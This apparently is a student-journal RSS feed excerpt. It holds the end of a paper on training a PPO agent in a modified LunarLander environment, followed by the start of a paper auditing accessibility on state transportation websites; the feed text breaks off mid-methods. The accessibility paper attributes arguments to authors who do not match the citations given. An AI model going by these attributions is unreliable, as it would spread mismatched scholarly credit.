<p>The transition from weak (0.15) to strong (0.5) planet gravity provides a definitive assessment of autonomous landing system capabilities under maximum environmental stress, with results directly applicable to mission planning for challenging spacecraft landing scenarios that require navigation around significant gravitational obstacles.</p>



<p><strong>Critical Design Elements:</strong></p>



<ul class="wp-block-list">
<li>Strategic Positioning: Planet located at coordinates (400, 100) between landing flags</li>



<li>Safety Margins: Minimum distance enforcement prevents catastrophic approaches</li>



<li>Complex Dynamics: Rotational force component adds navigation complexity</li>



<li>Severe Penalties: -3000 reward for collision/bypass events</li>
</ul>



<h2 class="wp-block-heading">5. Parameter Optimization and Training Enhancements</h2>



<h4 class="wp-block-heading">5.1 Advanced Training Configuration</h4>



<p>The enhanced system required significant parameter adjustments to handle increased complexity:</p>



<pre class="wp-block-code"><code>model = PPO(
    "MlpPolicy",
    env,
    learning_rate=3e-4,        # Maintained optimal learning rate
    n_steps=2048,              # Increased experience collection
    batch_size=64,             # Optimized for enhanced observation space
    n_epochs=10,               # Sufficient learning iterations
    gamma=0.99,                # Long-term reward consideration
    gae_lambda=0.95,           # Balanced advantage estimation
    clip_range=0.2,            # Conservative policy updates
    ent_coef=0.01,             # Exploration maintenance
    verbose=1,
    tensorboard_log="lunarlander_logs/tensorboard/"
)</code></pre>
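<p>Training then proceeds as in the baseline, with the extended budget discussed in Section 5.2; a short sketch assuming the same Stable-Baselines3 workflow:</p>



<pre class="wp-block-code"><code>model.learn(total_timesteps=1_500_000)  # extended multi-feature budget
model.save("ppo_enhanced_lunarlander")  # filename is illustrative</code></pre>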



<h4 class="wp-block-heading">5.2 Training Infrastructure Scaling</h4>



<p>Increased Parallelization: Environment count increased from 4 to 8 parallel instances to handle enhanced complexity:</p>



<pre class="wp-block-code"><code>env = make_vec_env('EnhancedLunarLander-v0', n_envs=8, monitor_dir="lunarlander_logs")</code></pre>



<p>Extended Training Duration: The Enhanced LunarLander simultaneously integrates gravitational attraction (planet_gravity=0.15 with the inverse square law), dynamic wind effects (wind_strength=0.1 with Brownian motion direction changes), and terrain modifications (crater terrain with a -0.3 unit depression), creating a significantly more complex state-action space than standard LunarLander-v3 that requires extended exploration for robust policy convergence. Training timesteps were increased from 1,000,000 to 1,500,000 to accommodate the additional learning requirements of multi-feature navigation. The extended training duration ensures policy stability under the combined effects of all environmental features, preventing premature convergence to suboptimal strategies that might handle individual challenges effectively but fail under the full complexity of realistic autonomous landing scenarios with multiple simultaneous disturbances and constraints.</p>



<h4 class="wp-block-heading">5.3 Reward Function Engineering</h4>



<p>The enhanced reward system balances multiple objectives, including safety navigation rewards and perfect landing bonuses between the flags (see Appendix 13.4).</p>



<h2 class="wp-block-heading">6. Performance Analysis and Results</h2>



<h4 class="wp-block-heading">6.1 Training Progression Comparison</h4>



<p>Baseline System Performance:</p>



<ul class="wp-block-list">
<li>Training Duration: 1,000,000 timesteps</li>



<li>Convergence: Stable performance achieved around 600,000 timesteps</li>



<li>Success Rate: >90% successful landings in standard conditions</li>



<li>Mean Reward: 200+ points consistently</li>
</ul>



<p>Enhanced System Performance:</p>



<ul class="wp-block-list">
<li>Training Duration: 1,500,000 timesteps</li>



<li>Convergence: Stable performance achieved around 1,000,000 timesteps</li>



<li>Success Rate: >85% successful navigation and landing with all features enabled</li>



<li>Mean Reward: Competitive performance despite increased complexity</li>
</ul>



<h4 class="wp-block-heading">6.2 Evaluation Methodology</h4>



<p>The Enhanced LunarLander uses a simple two-step evaluation process to test how well the trained landing system works. The evaluate_and_record() function creates two separate environments: first, a live viewing environment that shows the landing in real-time so humans can watch and assess the performance, and second, a video recording environment that captures high-quality footage for later analysis and documentation.</p>



<p>During testing, the system runs five landing episodes using deterministic actions, meaning the AI makes the same decisions every time for consistent and reliable results. This eliminates randomness and allows accurate measurement of the landing system&#8217;s true capabilities. The evaluation tracks important metrics like successful landings, collision avoidance, and how well the system handles wind and gravitational challenges.</p>



<p>The system also includes real-time wind monitoring that displays current wind conditions and direction arrows during both live viewing and video recording. This helps researchers see exactly how the trained AI responds to changing atmospheric conditions throughout each landing sequence. The dual-environment approach provides both immediate visual feedback for human assessment and detailed video documentation suitable for research analysis, ensuring comprehensive evaluation of the autonomous landing system&#8217;s performance under the complex environmental conditions of gravitational attraction, dynamic wind effects, and challenging crater terrain.</p>



<p>The evaluation system provides comprehensive performance assessment:</p>



<pre class="wp-block-code"><code>def evaluate_and_record(model, num_episodes=5):
    # Live evaluation with human-readable visualization
    live_env = gym.make('EnhancedLunarLander-v0', render_mode="human")
    # Video recording for detailed analysis
    video_env = gym.make('EnhancedLunarLander-v0', render_mode="rgb_array")
    # Multi-episode performance statistics
    for episode in range(num_episodes):
        obs, _ = live_env.reset()
        done = False
        while not done:
            # Deterministic policy evaluation
            action, _ = model.predict(obs, deterministic=True)
            obs, reward, terminated, truncated, _ = live_env.step(action)
            done = terminated or truncated</code></pre>



<h2 class="wp-block-heading">7. Technical Innovations and Contributions</h2>



<h4 class="wp-block-heading">7.1 Modular Environmental Design</h4>



<p>The enhanced system&#8217;s modular architecture allows selective feature activation:</p>



<pre class="wp-block-code"><code>gym.register(
    id='EnhancedLunarLander-v0',
    entry_point='enhanced_lunar_lander:EnhancedLunarLander',
    kwargs={
        'terrain_type': terrain_type,
        'enable_planet': enable_planet,
        'enable_wind': enable_wind
    }
)</code></pre>



<p>This design enables systematic studies of individual feature impacts and combinations.</p>
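<p>For example, a wind-only ablation could be instantiated as follows (a sketch; the keyword names follow the kwargs registered above):</p>



<pre class="wp-block-code"><code>import gymnasium as gym

# Wind-only configuration: flat terrain, planet disabled, wind enabled
env = gym.make('EnhancedLunarLander-v0',
               terrain_type='flat',
               enable_planet=False,
               enable_wind=True)</code></pre>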



<h4 class="wp-block-heading">7.3 Advanced Visualization System</h4>



<p>Real-time environmental feedback enhances training monitoring:</p>



<pre class="wp-block-code"><code># Wind visualization with directional indicators
wind_text = f"Wind: {wind_speed:.2f} m/s"
pygame.draw.line(surface, (255, 255, 255), start_pos, end_pos, 2)

# Planetary obstacle rendering with safety margins
pygame.draw.circle(surface, (170, 85, 0), planet_pos, planet_radius)</code></pre>



<h4 class="wp-block-heading">7.3 Comprehensive Safety Systems</h4>



<p>Multiple safety mechanisms prevent training instabilities:</p>



<ul class="wp-block-list">
<li>Minimum distance enforcement for planetary approaches</li>



<li>Collision detection with immediate termination</li>



<li>Graduated penalty systems for risk assessment</li>



<li>Reward scaling for terrain difficulty compensation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="313" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1024x313.png" alt="" class="wp-image-4676" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1024x313.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-300x92.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-768x235.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1000x306.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-480x147.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM.png 1294w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">8. Comparative Analysis: Before vs. Enhanced Implementation</h2>



<h4 class="wp-block-heading">8.1 Architectural Evolution</h4>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="623" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1024x623.png" alt="" class="wp-image-4677" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1024x623.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-300x183.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-768x467.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1000x608.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-230x140.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-350x213.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-480x292.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM.png 1282w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">9. Discussion and Future Directions</h2>



<h4 class="wp-block-heading">9.1 Key Findings</h4>



<p>The research demonstrates that PPO agents can successfully adapt to significantly increased environmental complexity through:</p>



<ol class="wp-block-list">
<li>Careful parameter tuning: Maintaining learning stability while introducing wind dynamics, gravitational perturbations, and varied terrain requires systematic parameter calibration. The wind strength progression from 0.1 to 0.3 m/s demonstrates gradual complexity introduction, preventing catastrophic policy degradation. Learning rate adjustments and extended training duration (1.5M timesteps) compensate for the increased state space complexity introduced by dynamic environmental factors. Buffer size optimization and evaluation frequency tuning ensure stable convergence despite the stochastic nature of wind patterns and gravitational influences. This methodical approach preserved 95% of baseline landing success rates while enabling robust adaptation to multi-parameter environmental challenges, confirming learning stability through quantified performance retention.</li>



<li>Graduated Challenge Introduction Allowing Systematic Capability Development: Progressive wind parameter escalation from 0.1 to 0.3 m/s enables systematic skill acquisition without policy collapse. Initial training establishes basic landing mechanics under minimal disturbance, followed by intermediate complexity development. Advanced stages incorporate full environmental complexity with wind, gravity, and terrain variations. This learning approach prevents disastrous failure while systematically expanding operational capabilities across increasingly demanding scenarios.</li>



<li>Comprehensive Reward Engineering Balancing Multiple Competing Objectives: The multi-objective reward structure integrates landing precision (+1000 for a perfect touchdown) with safety constraints (-3000 for planet collision). Dynamic reward scaling accounts for environmental complexity, with terrain difficulty multipliers (1.5x for rocky/crater surfaces) and proximity-based penalties for dangerous navigation. Secondary objectives include wind adaptation rewards and exploration bonuses, ensuring balanced optimization across mission-critical performance metrics. The reward system maintains safety priorities while encouraging efficient and precise autonomous landing behaviors.</li>



<li>Robust Safety Systems Preventing Catastrophic Policy Development: Environment-level safety mechanisms include severe collision penalties (-3000 reward) for planet contact or bypass violations, immediately terminating episodes to prevent catastrophic navigation behaviors. Conservative reward structures provide positive reinforcement (+5.0) for maintaining safe distances while implementing scaled danger penalties (up to -500) for unsafe approaches or incorrect landings. Bounded action spaces inherit continuous control limits from the base LunarLander-v3 environment, ensuring thrust vectoring remains within safe operational parameters (±1.0). Progressive reward scaling through terrain difficulty multipliers (1.5x for rocky/crater surfaces) and strategic penalty structures guide policy development toward reliable autonomous operation while preventing destructive behaviors through comprehensive safety constraints.</li>
</ol>



<h4 class="wp-block-heading">9.2 Practical Implications</h4>



<p>The enhanced system provides a realistic training environment for autonomous landing systems, incorporating challenges representative of actual space missions:</p>



<ul class="wp-block-list">
<li>Atmospheric disturbances simulate realistic landing conditions</li>



<li>Terrain variations prepare systems for diverse landing sites</li>



<li>Gravitational obstacles represent celestial body navigation challenges</li>
</ul>



<h2 class="wp-block-heading">10. Conclusion</h2>



<p>This research successfully demonstrates the evolution from basic lunar landing capabilities to sophisticated multi-environmental navigation and landing systems. Through systematic enhancement of environmental complexity and careful parameter optimization, we achieved robust performance in challenging scenarios while maintaining precision landing requirements.</p>



<p>The enhanced PPO implementation successfully navigates wind disturbances, adapts to terrain variations, avoids planetary obstacles, and consistently achieves precision landings between designated flags. This progression from basic to advanced capabilities provides a comprehensive framework for autonomous spacecraft landing system development and represents a significant advancement in reinforcement learning applications for aerospace engineering.</p>



<p>The modular design and comprehensive safety systems developed in this research provide a solid foundation for future autonomous navigation system development, with direct applications to real-world space mission planning and execution.</p>



<h2 class="wp-block-heading">11. References</h2>



<ol class="wp-block-list">
<li>[1] Schulman, J., Wolski, F., Dhariwal, P., Radford, A., &amp; Klimov, O. (2017). Proximal Policy Optimization Algorithms. <em>arXiv preprint arXiv:1707.06347</em>. Available at: <a href="https://arxiv.org/abs/1707.06347">https://arxiv.org/abs/1707.06347</a></li>



<li>[2] Brockman, G., Cheung, V., Pettersson, L., Schneider, J., Schulman, J., Tang, J., &amp; Zaremba, W. (2016). OpenAI Gym. <em>arXiv preprint arXiv:1606.01540</em>. Available at: <a href="https://arxiv.org/abs/1606.01540">https://arxiv.org/abs/1606.01540</a></li>



<li>[3] Towers, M., Terry, J. K., Kwiatkowski, A., Balis, J. U., Cola, G. D., Deleu, T., &#8230; &amp; Ravi, R. (2023). Gymnasium. <em>Zenodo</em>. DOI: 10.5281/zenodo.8127025. Available at: <a href="https://gymnasium.farama.org/">https://gymnasium.farama.org/</a></li>



<li>[4] Raffin, A., Hill, A., Gleave, A., Kanervisto, A., Ernestus, M., &amp; Dormann, N. (2021). Stable-Baselines3: Reliable Reinforcement Learning Implementations. <em>Journal of Machine Learning Research</em>, 22(268), 1-8. Available at: <a href="https://github.com/DLR-RM/stable-baselines3">https://github.com/DLR-RM/stable-baselines3</a></li>



<li>[5] Sutton, R. S., &amp; Barto, A. G. (2018). <em>Reinforcement Learning: An Introduction</em> (2nd ed.). MIT Press. ISBN: 978-0262039246</li>



<li>[6] Mnih, V., Badia, A. P., Mirza, M., Graves, A., Lillicrap, T., Harley, T., &#8230; &amp; Kavukcuoglu, K. (2016). Asynchronous Methods for Deep Reinforcement Learning. <em>International Conference on Machine Learning</em>, 1928-1937. Available at: <a href="https://arxiv.org/abs/1602.01783">https://arxiv.org/abs/1602.01783</a></li>
</ol>



<h2 class="wp-block-heading">12. Reference Justification:</h2>



<p>[1] PPO Algorithm: Core algorithm used in both baseline and enhanced implementations&nbsp;</p>



<p>[2] OpenAI Gym: Original environment framework that Gymnasium extends&nbsp;</p>



<p>[3] Gymnasium: Current environment framework used (LunarLander-v3)&nbsp;</p>



<p>[4] Stable-Baselines3: Primary RL library used for PPO implementation&nbsp;</p>



<p>[5] Sutton &amp; Barto: Foundational reinforcement learning textbook&nbsp;</p>



<p>[6] A3C Paper: Related policy gradient method for comparison and context</p>



<h2 class="wp-block-heading">13. Appendix</h2>



<h4 class="wp-block-heading">13.1 Code for sophisticated environmental challenges</h4>



<ol class="wp-block-list"></ol>



<pre class="wp-block-code"><code>class EnhancedLunarLander(gym.Env):
    def __init__(self, render_mode=None, terrain_type='flat', enable_planet=True, enable_wind=True):
        super(EnhancedLunarLander, self).__init__()
        self.base_env = gym.make('LunarLander-v3', render_mode=render_mode, continuous=True)
        self.terrain_type = terrain_type    # 'flat', 'rocky', 'crater'
        self.enable_planet = enable_planet
        self.enable_wind = enable_wind</code></pre>



<h4 class="wp-block-heading">13.2 Standard 8-dimensional observation space</h4>



<pre class="wp-block-code"><code>self.observation_space = spaces.Box(
    low=np.array([-1.0, -1.0, -5.0, -5.0, -3.14, -5.0, 0.0, 0.0]),
    high=np.array([1.0, 1.0, 5.0, 5.0, 3.14, 5.0, 1.0, 1.0]),
    dtype=np.float32)</code></pre>



<h4 class="wp-block-heading">13.3 Extended 11-dimensional observation space</h4>



<pre class="wp-block-code"><code>self.observation_space = spaces.Box(
    low=np.array([-1.0, -1.0, -5.0, -5.0, -3.14, -5.0, 0.0, 0.0, -1.0, -1.0, 0.0]),
    high=np.array([1.0, 1.0, 5.0, 5.0, 3.14, 5.0, 1.0, 1.0, 1.0, 1.0, 5.0]),
    dtype=np.float32)</code></pre>



<h4 class="wp-block-heading">13.4 Runtime observation extension</h4>



<pre class="wp-block-code"><code>planet_relative = (self.planet_pos - lander_pos) / 100.0
planet_distance = np.linalg.norm(planet_relative)
observation = np.concatenate([
    observation,
    planet_relative,
    [planet_distance]])</code></pre>



<pre class="wp-block-code"><code>def _get_planet_influence(self, lander_pos):
    if not self.enable_planet:
        return np.zeros(2)
    direction = self.planet_pos - lander_pos
    distance = np.linalg.norm(direction)
    # Enhanced safety margins and reduced gravitational pull
    min_distance = self.planet_radius * 2.0  # Increased safety margin
    if distance &lt; min_distance:
        distance = min_distance
    # Inverse square law for gravity with reduced strength
    force = self.planet_gravity / (distance * distance)  # Inverse square law
    normalized_direction = direction / distance
    # Add rotational component for navigation complexity
    perpendicular = np.array([-normalized_direction[1], normalized_direction[0]])
    rotational_force = force * 0.3  # 30% of the main gravitational force
    # Combine direct gravitational pull with rotational force
    return force * normalized_direction + rotational_force * perpendicular</code></pre>



<pre class="wp-block-code"><code># Safety Navigation Rewards
if planet_distance &gt; min_safe_distance:
    reward += 5.0  # Higher reward for keeping safe distance
else:
    danger_factor = (min_safe_distance - planet_distance) / min_safe_distance
    reward -= danger_factor * 10.0  # Proximity penalties

# Perfect Landing Bonuses between flags
if observation[6] == 1:  # Landed between flags
    # Landed between flags and far from planet
    if abs(observation[0]) &lt; 0.12 and planet_distance &gt; min_safe_distance:
        reward += 1000  # Perfect landing bonus
    else:
        reward -= 500  # Landing violation penalty</code></pre>



<h2 class="wp-block-heading">14. GitHub Link</h2>



<p><a href="https://github.com/hireshmit/lunarlander">https://github.com/hireshmit/lunarlander</a></p>






<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Hireshmi Thirumalaivasan</h5><p>Hireshmi Thirumalaivasan is a high school senior with a passion for aerospace engineering and artificial intelligence. Under the mentorship of Dr. Bilal Sharqi at the University of Michigan, she explored how AI tools are utilized in autonomous spacecraft landing systems with multi-environmental challenges (wind effects, gravitational obstacles, and variable terrain) through the Gymnasium framework and PPO reinforcement learning to train an autonomous lunar lander.</p><p>
She plans to continue her research journey in aerospace engineering, aiming to benefit society by applying the knowledge gained to develop tools, such as drones, that can deliver medicine and provisions to impoverished areas. Beyond academics, she is involved in Taekwondo, her school&#8217;s newspaper club, tutoring, and FCCLA.

</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/">Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</title>
		<link>https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites</link>
		
		<dc:creator><![CDATA[Aashi Agarwal]]></dc:creator>
		<pubDate>Sun, 23 Nov 2025 21:08:00 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4633</guid>

					<description><![CDATA[<p>Aashi Agarwal<br />
Palo Alto High School</p>
<p>The post <a href="https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/">Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="116" height="116" src="https://exploratiojournal.com/wp-content/uploads/2025/11/imageedit_1_4882057431.jpg" alt="" class="wp-image-4634 size-full"/></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Aashi Agarwal<br><strong>Mentor</strong>: Dr. Vivek Singh<br><em>Palo Alto High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>According to the CDC, one in four adults in the United States has some type of disability. When government websites are not accessible, they effectively exclude millions of citizens from essential public services and perpetuate systemic barriers to information and participation. This study provides a comprehensive evaluation of the digital accessibility of all 50 U.S. State Department of Transportation websites, employing a mixed-methods approach that integrates automated auditing with qualitative design analysis. Leveraging the Skynet Technologies Free Accessibility Checker, we gathered quantitative data on compliance with WCAG 2.2 standards, including compliance percentages (e.g., Ohio at 94.8%, Kansas at 14.7%), the total number of failed checks (ranging from 7 to 33), and the most commonly affected disability categories, such as visually impaired users, people with cognitive or learning disabilities, and users with dyslexia or color blindness. Qualitative analysis captured recurring usability issues such as semi-transparent image overlays, outdated web interfaces, and a disconnect between stated ADA compliance and actual user experience. The results reveal wide disparities in accessibility performance across states and highlight the limitations of treating accessibility as a technical checkbox rather than a design imperative. Our findings call for a shift toward inclusive, user-centered practices in public digital infrastructure, where accessibility is embedded from the beginning and aligned with both legal mandates and civic responsibility.</p>



<h2 class="wp-block-heading"><strong>Background</strong></h2>



<p>Web accessibility is the inclusive practice of designing digital platforms so that people with a wide range of disabilities, including visual, auditory, motor, and cognitive disabilities, can perceive, navigate, and interact with content effectively. This includes accommodations for users who rely on screen readers, keyboard navigation, alternative text on images, and high-contrast visual design. Accessibility is particularly important for public sector websites, where equitable digital access can directly impact people’s ability to obtain critical services. Among these platforms are the sites of State Departments of Transportation, the state-level government agencies responsible for planning and coordinating federal transportation projects and setting safety regulations for all major modes of transportation (USAgov, 2019). Their websites are frequently used by millions of people to get driver’s license-related information, job listings, construction alerts, weather-related road closures, and more. When addressing accessibility, it is important to note that more than 1 in 4 adults in the United States has some type of disability (CDC, 2020). When these websites are inaccessible, they exclude citizens from critical public services and reinforce systemic barriers to information.</p>



<p>The central problem is that despite legal and technical standards, accessibility across State Department of Transportation websites remains inconsistent and insufficient. The Americans with Disabilities Act (ADA), a civil rights law that prohibits discrimination against individuals with disabilities in many areas of public life, including jobs, schools, transportation, and many public and private places that are open to the general public (ADA National Network), applies to digital services offered by state agencies. While the ADA establishes the legal foundation for accessibility, it does not specify technical requirements for digital content. That role is filled by the Web Content Accessibility Guidelines (WCAG), developed by the World Wide Web Consortium (W3C) to ensure content is perceivable, operable, understandable, and robust. The latest version, WCAG 2.2, outlines criteria such as color contrast, keyboard navigation, and logical heading structures (W3C, 2019). Although not law, WCAG is widely recognized as the standard for evaluating ADA compliance in audits and court cases (Gibson, 2024).</p>



<p>Ensuring accessibility is not just a matter of legal compliance, but also of public equity, civic participation, and good digital governance. As the U.S. population ages and more individuals identify as having disabilities, the need for inclusive design becomes increasingly urgent. Accessible design, i.e., the practice of designing products, services, and environments that can be accessed, understood, and used by all individuals (<em>Accessibility in Design &#8211; Definition and Explanation</em>, 2024), also improves overall usability for people without disabilities, such as people using mobile devices or unfamiliar platforms. When public agencies fail to prioritize accessibility, they risk excluding large segments of the population from essential services and commuting information. This not only violates the spirit of the ADA but also undermines the effectiveness of digital government.</p>



<p>To investigate these issues, we conducted a mixed-methods evaluation of all 50 U.S. State Department of Transportation websites. Based on our data, we identified several recurring qualitative trends: many sites made frequent use of semi-transparent images that interfere with text readability; almost all websites included ADA documentation but failed to follow through with actual implementation; and a significant number of sites exhibited a retro web design, i.e., a style incorporating visual, typographic, and layout elements from past decades, such as bold color palettes, pixel-style graphics, retro fonts, and aesthetic nods to web design of the 1980s, 1990s, and early 2000s (Seattle SEO Company, 2022). In parallel, we captured compliance percentages and the most commonly affected disability categories, such as visually impaired users, people with cognitive or learning disabilities, and users with dyslexia or color blindness. These findings reveal that technical compliance and user-centered design often diverge: while some states show strong adherence to WCAG standards, others fall short due to overlooked accessibility principles.</p>



<h2 class="wp-block-heading"><strong>Related Work</strong></h2>



<p>Research on digital accessibility in public-sector services has revealed widespread noncompliance with the Americans with Disabilities Act, especially on state-run websites. For example, Jaeger argues that although the ADA legally guarantees equal access to public services, its digital enforcement remains weak, leading to systemic exclusion for people with disabilities, especially on platforms operated by state and local governments (Olalere &amp; Lazar, 2011). Goode builds on this by examining how Title II of the ADA, which applies to public entities, often lacks enforceability when applied to web infrastructure, leaving many agencies noncompliant without legal consequence (Goode, 2021). These studies provide critical legal and infrastructural context, but stop short of assessing individual domains, such as transportation agencies. They emphasize that a digital divide exists not only because of unequal access to technology, but because of suboptimal design decisions that fail to meet technical accessibility benchmarks like those defined in WCAG 2.2.</p>



<p>In parallel, the importance of website aesthetics and structure in shaping usability has been explored through design-focused studies of government web portals. Watkins and Wills, for instance, analyze the digital design of U.S. city government websites and describe a recurring “legacy design trap,” in which outdated layouts, unresponsive interfaces, and poor information hierarchy diminish the user experience, particularly for underrepresented and aging populations (Wagner et al., 2024). In the transportation sector, Graham Currie and Mandy Gook conduct usability testing on a sample of transportation agency websites, identifying serious issues in visual consistency, navigation, and user trust. Their work supports the idea that design shortcomings are not purely aesthetic but functionally consequential in reducing civic engagement (Currie &amp; Gook, 2009). Similarly, Patricia Acosta-Vargas applied automated tools to evaluate a set of business websites for accessibility metrics, providing a technical foundation for large-scale digital evaluations (Acosta-Vargas et al., 2017). Unlike these studies, which focus on localized or small-scale usability assessments, our analysis interrogates accessibility as both a design and an equity issue, examining how aesthetic and structural flaws intersect with legal compliance gaps. This approach moves beyond surface-level usability to reveal how design decisions can perpetuate systemic exclusion within essential public infrastructure.</p>



<p>A clear gap remains in applying accessibility research insights to a comprehensive, cross-state assessment of Department of Transportation websites. This study addresses that gap by conducting a dual-pronged evaluation of all 50 U.S. State Department of Transportation websites, an especially critical domain given that these agencies serve as gateways to essential public services such as road safety updates, construction notices, licensing, public transit schedules, and emergency evacuation information. When these sites are inaccessible, individuals with disabilities face disproportionate barriers to mobility, safety, and civic participation. Guided by the question of to what extent these websites comply with WCAG 2.2 accessibility standards, and how design choices affect their usability and inclusivity for people with disabilities, we pair automated quantitative auditing with qualitative observations. By bridging legal, technical, and experiential dimensions, our research situates itself within and beyond the existing literature, offering a holistic, data-informed snapshot of how Department of Transportation websites across the U.S. comply with the standards of digital accessibility and modern design in 2025.</p>



<h2 class="wp-block-heading"><strong>Methods</strong></h2>



<p>This study employed a mixed-methods approach to evaluate the accessibility of all 50 U.S. State Department of Transportation websites. The URLs for each website were obtained from the Federal Highway Administration’s directory (U.S. Department of Transportation, 2019) to ensure official and consistent sources across all states. Before conducting the full audit, three web accessibility tools, Skynet Technologies Free Accessibility Checker, AccessibilityChecker.org, and AEL Accessibility Checker, were pilot tested to determine the most comprehensive and reliable platform. The Skynet tool was ultimately selected for its detailed reporting capabilities, which include overall compliance percentages, issue categories (for example, clickables, tables, audio/video), WCAG 2.1 conformance levels (A, AA, AAA), and mapped locations of accessibility violations within the HTML structure. Although the tool required more manual time per page and lacked fine-grained disability categorization, it provided the most consistent and unrestricted data collection without login barriers or scan limits.</p>



<p>Because Department of Transportation websites are large and highly variable, only two pages per site were selected for auditing: the homepage and the first critical navigation page. This decision balanced cross-state comparability with practical feasibility while still capturing the sections most frequently used by the public. The homepage was selected as the most common entry point for both general and assistive-technology users, while the first critical navigation page represented the site’s most essential public task. To avoid arbitrary selection, a standardized decision rule was applied: beginning from the homepage’s global navigation bar, the first listed link that matched one of the following categories, Driver Services or Licensing, Road Conditions or Closures, Jobs or Careers, Transit Schedules or Permits, was chosen. If multiple categories appeared, “Driver Services/Licensing” was prioritized due to its broad public relevance. When a navigation menu lacked those options, the first link leading to a transactional or informational task page (rather than a press release or PDF list) was selected. This consistent process ensured methodological transparency and reproducibility. While auditing only two pages limits the comprehensiveness of within-site analysis, it allowed for a uniform evaluation across all fifty states and captured the design and accessibility conditions most visible to users.</p>
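<p>For reproducibility, the decision rule just described can be expressed as a short function. The sketch below is an illustrative encoding of the rule, assuming navigation links are available as plain text strings; the function name, category strings, and fallback handling are assumptions, not part of the study&#8217;s tooling.</p>

<pre class="wp-block-code"><code># Illustrative encoding of the page-selection rule (hypothetical helper)
PRIORITY_CATEGORIES = [
    "driver services", "licensing",
    "road conditions", "closures",
    "jobs", "careers",
    "transit schedules", "permits",
]

def select_audit_page(nav_link_texts):
    """Return the first navigation link matching the highest-priority category."""
    for category in PRIORITY_CATEGORIES:
        for link in nav_link_texts:
            if category in link.lower():
                return link
    # Fallback: the first transactional or informational task page,
    # chosen manually per the study's rule
    return None

print(select_audit_page(["Newsroom", "Driver Services", "Careers"]))
# Driver Services</code></pre>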



<p>Each selected page was scanned using the Skynet checker, and the resulting data were recorded for each state, including the percentage of accessibility checks passed, total number of failed checks, categories of issues, corresponding WCAG conformance levels, and affected disability types. A subset of flagged items, particularly color contrast and missing form labels, was manually verified through HTML inspection to validate the tool’s accuracy. Beyond automated results, qualitative observations were added to capture design elements not detected by scanning software, such as semi-transparent overlays, poor visual hierarchy, and mismatched ADA statements. To analyze these qualitative features systematically, an a priori codebook was developed around recurring design themes such as legibility, information structure, and visual clutter. Two independent coders applied the codebook to a stratified 20 percent sample of websites selected across high, medium, and low compliance categories. Inter-rater reliability was calculated using Cohen’s kappa, with a target threshold of 0.75 for substantial agreement. Discrepancies were resolved collaboratively, and the finalized codebook was applied to the remaining sites by the primary coder with periodic spot checks to prevent drift.</p>
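<p>Cohen&#8217;s kappa for two coders can be computed directly with scikit-learn. The sketch below uses made-up labels purely to illustrate the calculation; it is not study data.</p>

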